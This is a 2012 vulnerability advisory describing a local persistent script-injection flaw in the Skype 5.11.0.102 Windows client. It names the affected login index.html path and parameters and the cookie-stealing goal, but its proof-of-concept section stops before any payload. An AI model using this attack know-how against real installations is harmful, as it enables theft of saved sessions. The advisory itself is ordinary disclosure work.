Document Title: =============== Microsoft Skype 5.11.0.102 - Login Page API Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=596 MSRC ID: 13166 Release Date: ============= 2012-05-23 Vulnerability Laboratory ID (VL-ID): ==================================== 596 Common Vulnerability Scoring System: ==================================== 2.2 Product & Service Introduction: =============================== Skype is a software application that allows users to make voice and video calls and chats over the Internet. Calls to other users within the Skype service are free, while calls to both traditional landline telephones and mobile phones can be made for a fee using a debit-based user account system. Skype has also become popular for its additional features which include instant messaging, file transfer, and videoconferencing. Skype has 663 million registered users as of 2010. The network is operated by Skype Limited, which has its headquarters in Luxembourg. Most of the development team and 44% of the overall employees of Skype are situated in the offices of Tallinn and Tartu, Estonia. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype) Abstract Advisory Information: ============================== The Vulnerability Laboratory Researcher Team discovered a new persistent softawre vulnerability in Microsofts Skype v5.11.0.102 (Windows). Discovery Status: ================= Published Affected Product(s): ==================== Microsoft Corp. Product: Skype - Software Client 5.11.0.102 Exploitation Technique: ======================= Local Severity Level: =============== Low Technical Details & Description: ================================ A persistent input validation web vulnerability is located in the official Skype VoIP Software v5.11.0.102 (Windows). The vulnerability allows local attackers to manipulate a configuration app login index file which results in the persistent execution of malicious script code through the skype software api context. The bug is located when processing to perform javascript onload requests directly in the link of the text context. In the `index.html` file of the `software C:/ProgramData/Skype/Apps/login` path manipualtions are possible. The script code executes through the api of skype and processed out of the software context itself. The scenario is a local exploitation method to execute script code or get cookies of saved password sessions (save password) when processing to manipulate, infiltrate or observe a voip communication via software. Successful exploitation of the vulnerability result in skype software context manipulation with api, cookie stealing in a local system when a session & pass is saved in the client and not expired. Exploitation requires local system access or privileged system account access to manipulate the index.html in the /login application folder. Vulnerable Module(s): [+] Microsoft Skype Vulnerable Module(s): [+] Login (App) Vulnerable Parameter(s): [+] skypeAccount - highlight & useExistingLiveid Proof of Concept (PoC): ======================= The local input validation vulnerability can be exploited by local attackers with privileged system access or system account. For demonstration or reproduce ... Review: skypeAccount - highlight & useExistingLiveid

What you can do: